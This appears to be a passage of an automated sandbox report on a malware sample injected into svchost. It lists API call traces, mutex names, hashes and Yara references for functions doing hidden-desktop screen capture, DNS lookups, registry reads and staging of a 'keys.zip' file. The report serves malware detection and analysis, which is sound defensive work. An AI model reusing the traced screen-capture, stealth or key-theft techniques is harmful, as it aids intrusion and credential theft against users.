                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000001,7556F550,75571620,80000002,?,?,02C84818), ref: 02C80872
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,?,02C84818), ref: 02C80875
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,02C84818), ref: 02C80882
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,02C84818), ref: 02C80885
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02C8089B
                                                                                                                                                                                                            • strstr.MSVCRT ref: 02C808B9
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,02C84818), ref: 02C808E7
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000,?,?,?,?,02C84818), ref: 02C808EA
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,02C84818), ref: 02C808F7
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,?,?,02C84818), ref: 02C808FA
                                                                                                                                                                                                              • Part of subcall function 02C80570: memset.MSVCRT ref: 02C805A3
                                                                                                                                                                                                              • Part of subcall function 02C80570: memset.MSVCRT ref: 02C805BB
                                                                                                                                                                                                              • Part of subcall function 02C80570: RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000101,80000002,?,?,?,?,7556F550,75571620), ref: 02C805DC
                                                                                                                                                                                                              • Part of subcall function 02C80570: RegQueryValueExA.ADVAPI32(80000002,92F35DE2a,00000000,00000001,?,00000104,?,?,?,?,7556F550,75571620), ref: 02C80603
                                                                                                                                                                                                              • Part of subcall function 02C80570: GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,?,?,?,?,7556F550,75571620), ref: 02C8068D
                                                                                                                                                                                                              • Part of subcall function 02C80570: HeapAlloc.KERNEL32(00000000,?,?,?,?,7556F550,75571620), ref: 02C80694
                                                                                                                                                                                                              • Part of subcall function 02C80570: memset.MSVCRT ref: 02C806A3
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$memset$FreeValidatestrstr$AdminAllocOpenQueryUserValue
                                                                                                                                                                                                            • String ID: set_url
                                                                                                                                                                                                            • API String ID: 3462927349-1295111526
                                                                                                                                                                                                            • Opcode ID: cda620ee7f2803b62b935c1a84ab0733a82987d75eb891d8c4ea899b9dbdd7a6
                                                                                                                                                                                                            • Instruction ID: d2685373e9730747ddc9d2bdb1d73698abc7836ff454eabe2fa69123fa625bc9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: cda620ee7f2803b62b935c1a84ab0733a82987d75eb891d8c4ea899b9dbdd7a6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B6212632E8637567E63236615C09F5B6A889FC0B59F098664ED08BB240EB61DE48C6F1
                                                                                                                                                                                                            Function 02C92A30 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 56sleepsynchronizationCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}), ref: 02C92A4C
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02C92A62
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}), ref: 02C92A70
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C92A79
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C92A91
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C92AA3
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da759), ref: 02C92AAE
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40,6d1da759,VEFK), ref: 02C92AC8
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Mutex$HandleOpenSleep$BackslashCloseInformationPathRelease
                                                                                                                                                                                                            • String ID: 6d1da759$Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}$P0Wu$VEFK
                                                                                                                                                                                                            • API String ID: 849374196-3602550973
                                                                                                                                                                                                            • Opcode ID: c4985611d2668c2d8f8bfd40c92cc39a25d6909fd499e99ca8dcf408cf499dbb
                                                                                                                                                                                                            • Instruction ID: cf5307aaa716208c13d45688a6128ea76d6d682987b08c38524c8f77d182b2d5
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c4985611d2668c2d8f8bfd40c92cc39a25d6909fd499e99ca8dcf408cf499dbb
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6901FE32EC57543BFB22A7619C0DF5A778CAF44B20F044658FD8597181DFB0951046EB
                                                                                                                                                                                                            Function 02C8D990 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 56sleepsynchronizationCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}), ref: 02C8D9AC
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02C8D9C2
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}), ref: 02C8D9D0
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C8D9D9
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C8D9F1
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C8DA03
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6d1da28e), ref: 02C8DA0E
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40,6d1da28e,CRAIF), ref: 02C8DA28
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Mutex$HandleOpenSleep$BackslashCloseInformationPathRelease
                                                                                                                                                                                                            • String ID: 6d1da28e$CRAIF$Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}$P0Wu
                                                                                                                                                                                                            • API String ID: 849374196-938674838
                                                                                                                                                                                                            • Opcode ID: 7abecb2b965fb5de8c60606add3be0048b7e0247f73bcc70fe952d1209e163ae
                                                                                                                                                                                                            • Instruction ID: 104e8e4c2d7b88b54f5b5cd2b4d18fb869c1bcacf3b05097bf7c6afeb6e5f25f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7abecb2b965fb5de8c60606add3be0048b7e0247f73bcc70fe952d1209e163ae
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F401D632EC47547AF312A7B15C0AF5A738CAF44B28F158664F909A31C1DBB499008AA6
                                                                                                                                                                                                            Function 02C75940 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 53libraryloadernetworkCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C75940
                                                                                                                                                                                                            • DnsFlushResolverCache.DNSAPI ref: 02C7594A
                                                                                                                                                                                                            • LoadLibraryExA.KERNEL32(Dnsapi.dll,00000000,00000000,75497390), ref: 02C7595A
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DnsQuery_A), ref: 02C75973
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DnsQuery_UTF8), ref: 02C7598F
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DnsQuery_W), ref: 02C759AB
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Query_Main), ref: 02C759C7
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressProc$AdminCacheFlushLibraryLoadResolverUser
                                                                                                                                                                                                            • String ID: DnsQuery_A$DnsQuery_UTF8$DnsQuery_W$Dnsapi.dll$Query_Main
                                                                                                                                                                                                            • API String ID: 2466897691-3547598143
                                                                                                                                                                                                            • Opcode ID: a2de0311593b83e19bab61a1b851fb9f8a9320d1bfd5ea6f19e30cd09f312231
                                                                                                                                                                                                            • Instruction ID: 8eefb0f407ac36fa6f6afb46c2e1072f14246f73863aaabdf619568f93586068
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a2de0311593b83e19bab61a1b851fb9f8a9320d1bfd5ea6f19e30cd09f312231
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 74018671BC435676B91231751C0AF4B972E4EC0ED5F9206B4FC12F2444DB96E20388B8
                                                                                                                                                                                                            Function 02C7B9D0 Relevance: 19.6, APIs: 13, Instructions: 116windowCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • IsWindow.USER32(00000000), ref: 02C7B9ED
                                                                                                                                                                                                            • IsWindowVisible.USER32(00000000), ref: 02C7B9FC
                                                                                                                                                                                                              • Part of subcall function 02C7CC80: GetClassNameA.USER32(?,?,00000101), ref: 02C7CC96
                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 02C7BA39
                                                                                                                                                                                                            • GetClassLongA.USER32(00000000,000000E6), ref: 02C7BA42
                                                                                                                                                                                                            • PrintWindow.USER32(00000000,?,00000000,?,755730D0,?,?,?,02C7843E), ref: 02C7BA55
                                                                                                                                                                                                            • RedrawWindow.USER32(00000000,00000000,00000000,00000485,00000000,?,?,755730D0,?,?,?,02C7843E), ref: 02C7BA7B
                                                                                                                                                                                                            • CreateRectRgn.GDI32(?,?,02C7843E,?), ref: 02C7BA91
                                                                                                                                                                                                            • GetWindowRgn.USER32(00000000,00000000), ref: 02C7BA9B
                                                                                                                                                                                                            • OffsetRgn.GDI32(00000000,?,?), ref: 02C7BAB5
                                                                                                                                                                                                            • SelectClipRgn.GDI32(?,00000000), ref: 02C7BAC0
                                                                                                                                                                                                            • BitBlt.GDI32(?,?,?,02C7843E,?,?,00000000,00000000,00CC0020), ref: 02C7BAE9
                                                                                                                                                                                                            • SelectClipRgn.GDI32(?,00000000), ref: 02C7BAF2
                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 02C7BAF5
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Window$ClassClipRectSelect$CreateDeleteLongNameObjectOffsetPrintRedrawVisible
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3597830993-0
                                                                                                                                                                                                            • Opcode ID: 67a26ccbdca2ca42c6637e339f99ddf5f65e0949e96558e05bc8d35b703e6993
                                                                                                                                                                                                            • Instruction ID: e0fbb222fdb7a689cd4738f8298ab91a3c5c0875cd4c5c97c898b7d6531adc1c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 67a26ccbdca2ca42c6637e339f99ddf5f65e0949e96558e05bc8d35b703e6993
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E4315E71E80114AFD715EBA5DC89FBF7BB8EF89B14F104648FA01A3180DB74AD118A70
                                                                                                                                                                                                            Function 02C7CAA0 Relevance: 19.6, APIs: 13, Instructions: 113filesynchronizationmemoryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 02C7CAA8
                                                                                                                                                                                                            • HeapCreate.KERNEL32(00000000,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CAB9
                                                                                                                                                                                                              • Part of subcall function 02C7C9F0: GetComputerNameA.KERNEL32(02CBD6A8,?), ref: 02C7CA07
                                                                                                                                                                                                              • Part of subcall function 02C7C9F0: lstrlenA.KERNEL32(02CBD6A8,?,?,02C861D1), ref: 02C7CA12
                                                                                                                                                                                                              • Part of subcall function 02C7C9F0: wsprintfA.USER32 ref: 02C7CA52
                                                                                                                                                                                                              • Part of subcall function 02C7C9F0: wsprintfA.USER32 ref: 02C7CA62
                                                                                                                                                                                                              • Part of subcall function 02C7C9F0: wsprintfA.USER32 ref: 02C7CA72
                                                                                                                                                                                                              • Part of subcall function 02C7C9F0: wsprintfA.USER32 ref: 02C7CA7F
                                                                                                                                                                                                              • Part of subcall function 02C7C9F0: wsprintfA.USER32 ref: 02C7CA8C
                                                                                                                                                                                                            • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00002939,02CBD6C0), ref: 02C7CAE3
                                                                                                                                                                                                            • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CAFC
                                                                                                                                                                                                              • Part of subcall function 02C780B0: SetThreadDesktop.USER32(?,7556F590,755616B0,00000000), ref: 02C780BF
                                                                                                                                                                                                              • Part of subcall function 02C780B0: GetDC.USER32(00000000), ref: 02C780C7
                                                                                                                                                                                                              • Part of subcall function 02C780B0: GetDeviceCaps.GDI32(00000000,0000000A), ref: 02C780D8
                                                                                                                                                                                                              • Part of subcall function 02C780B0: GetDeviceCaps.GDI32(00000000,00000008), ref: 02C780E9
                                                                                                                                                                                                              • Part of subcall function 02C780B0: CreateCompatibleBitmap.GDI32(00000000,00000000,?), ref: 02C78100
                                                                                                                                                                                                              • Part of subcall function 02C780B0: GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 02C78142
                                                                                                                                                                                                              • Part of subcall function 02C780B0: GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,00000028,00000000), ref: 02C78152
                                                                                                                                                                                                              • Part of subcall function 02C780B0: DeleteObject.GDI32(00000000), ref: 02C78155
                                                                                                                                                                                                              • Part of subcall function 02C780B0: ReleaseDC.USER32(00000000,00000000), ref: 02C7815E
                                                                                                                                                                                                              • Part of subcall function 02C780B0: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02C781B9
                                                                                                                                                                                                            • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,02CBD66C), ref: 02C7CB29
                                                                                                                                                                                                            • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CB3C
                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,02CBD790,?,?,02C77262,00000000,00000000), ref: 02C7CB5A
                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CB6B
                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,02CBD750,?,?,02C77262,00000000,00000000), ref: 02C7CB7F
                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CB98
                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CBAB
                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,02C77262,00000000,00000000), ref: 02C7CBBE
                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,02CBD6FC,?,?,02C77262,00000000,00000000), ref: 02C7CBD4
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Create$wsprintf$EventFile$Mutex$BitsCapsDeviceHeapMappingView$BitmapCompatibleComputerCountDeleteDesktopFreeNameObjectReleaseThreadTicklstrlen
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2940656088-0
                                                                                                                                                                                                            • Opcode ID: a3c7da03c06e7baacfa3e58cff91971bdf7a1da4547cc210a681c6769fa2a69e
                                                                                                                                                                                                            • Instruction ID: 7143cfbcd07b478516294d572ce1f76d00f89f23f1645128c4751ac3e455c077
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a3c7da03c06e7baacfa3e58cff91971bdf7a1da4547cc210a681c6769fa2a69e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 37315870FC47067AFA625B799C43F552A98AB84F11F240A67B705FE1C1DAE0E2108A69
                                                                                                                                                                                                            Function 02C8F870 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 139COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA0AA,?,76C0BF00), ref: 02C8F8A0
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000,?,76C0BF00), ref: 02C8F8E1
                                                                                                                                                                                                            • GetLastError.KERNEL32(?,76C0BF00), ref: 02C8F8EB
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C8F8F3
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8F904
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,76C0BF00), ref: 02C8F90B
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?,?,76C0BF00), ref: 02C8F918
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA0AA,?,?,?,76C0BF00), ref: 02C8F987
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Path$BackslashDirectoryErrorLast$AdminCreateCurrentFolderMakeSystemUser
                                                                                                                                                                                                            • String ID: 6D1DA0AA$keys.zip$path1.txt
                                                                                                                                                                                                            • API String ID: 1373881290-3488207752
                                                                                                                                                                                                            • Opcode ID: 995880c70c9912810f1758e375a2811a9e2a576be5440f13094ddfdcdb918970
                                                                                                                                                                                                            • Instruction ID: 29d7d588c098d824c285a5ef575a4294df5b1a72b2e407bb19de8d166829a7dc
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 995880c70c9912810f1758e375a2811a9e2a576be5440f13094ddfdcdb918970
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3E415B315002455FCB16DF2498A87E7BBE9EF85304F54C5E8D9C9C7600EB70DA49C790
                                                                                                                                                                                                            Function 02C92180 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 138COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA6D0), ref: 02C921B0
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C921F1
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02C921FB
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C92203
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C92214
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02C9221B
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?), ref: 02C92228
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(6D1DA6D0,?,02C923DC), ref: 02C92297
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Path$BackslashDirectoryErrorLast$AdminCreateCurrentFolderMakeSystemUser
                                                                                                                                                                                                            • String ID: 6D1DA6D0$keys.zip$path1.txt
                                                                                                                                                                                                            • API String ID: 1373881290-2594074195
                                                                                                                                                                                                            • Opcode ID: bad6e884dcd6c20827d84814306d4c4b625bec54e46aebd30b1b17291ffe3891
                                                                                                                                                                                                            • Instruction ID: af73b95f3afc7f7d0884e6785d3ddf53a614609f7025e591714c5bd7d1cea629
                                                                                                                                                                                                            • Opcode Fuzzy Hash: bad6e884dcd6c20827d84814306d4c4b625bec54e46aebd30b1b17291ffe3891
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7D4114719046455FCF168B24AC9CBEABBE9EF85300F148694EDC9C7201EB71CA58CB91
                                                                                                                                                                                                            Function 02C7A8A0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81synchronizationwindowthreadCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C7A8C3
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C7A8F0
                                                                                                                                                                                                            • IsWindow.USER32(?), ref: 02C7A8F7
                                                                                                                                                                                                            • SendMessageA.USER32(?,00000215,00000000,00000000), ref: 02C7A909
                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02C7A918
                                                                                                                                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 02C7A922
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C7A934
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02C7A961
                                                                                                                                                                                                            • IsWindow.USER32(?), ref: 02C7A968
                                                                                                                                                                                                            • SendMessageA.USER32(?,00000215,00000000,?), ref: 02C7A97B
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Window$MessageMutexObjectReleaseSendSingleThreadWait$CurrentProcess
                                                                                                                                                                                                            • String ID: P0Wu
                                                                                                                                                                                                            • API String ID: 2596333622-465009422
                                                                                                                                                                                                            • Opcode ID: 6732ab873021143345105f0ae7f6a40ba091e59bea1e656974525272d65fe9d3
                                                                                                                                                                                                            • Instruction ID: 11d871deff8ae8ac6c3bb86cc3c047be6394bae5bf7a145b80572d6ccf4b0d3c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6732ab873021143345105f0ae7f6a40ba091e59bea1e656974525272d65fe9d3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4621E231A80210AFC7028B65E84CFABBBA8FFD8721F054BB6F118C7251CB705561CBA0
                                                                                                                                                                                                            Function 02C73690 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 59libraryloaderCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 02C736A1
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,?,7744C3F0,02C8599A), ref: 02C736B4
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 02C736C0
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 02C736ED
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll,?,7744C3F0,02C8599A), ref: 02C736FA
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 02C73706
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C73739
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AddressCountHandleModuleProcTick$_snprintf
                                                                                                                                                                                                            • String ID: %x%x$3abfb9076ff185e9$RtlUniform$ntdll.dll
                                                                                                                                                                                                            • API String ID: 3150073801-2212728350
                                                                                                                                                                                                            • Opcode ID: 16fb7404595c9f76e062ddb822cafc78445c59f754da67f144b58160114fee1f
                                                                                                                                                                                                            • Instruction ID: d3b5ad9f9c5bacf3d36841ec1f4113d1771ff468889bfe1a1784290c724589eb
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 16fb7404595c9f76e062ddb822cafc78445c59f754da67f144b58160114fee1f
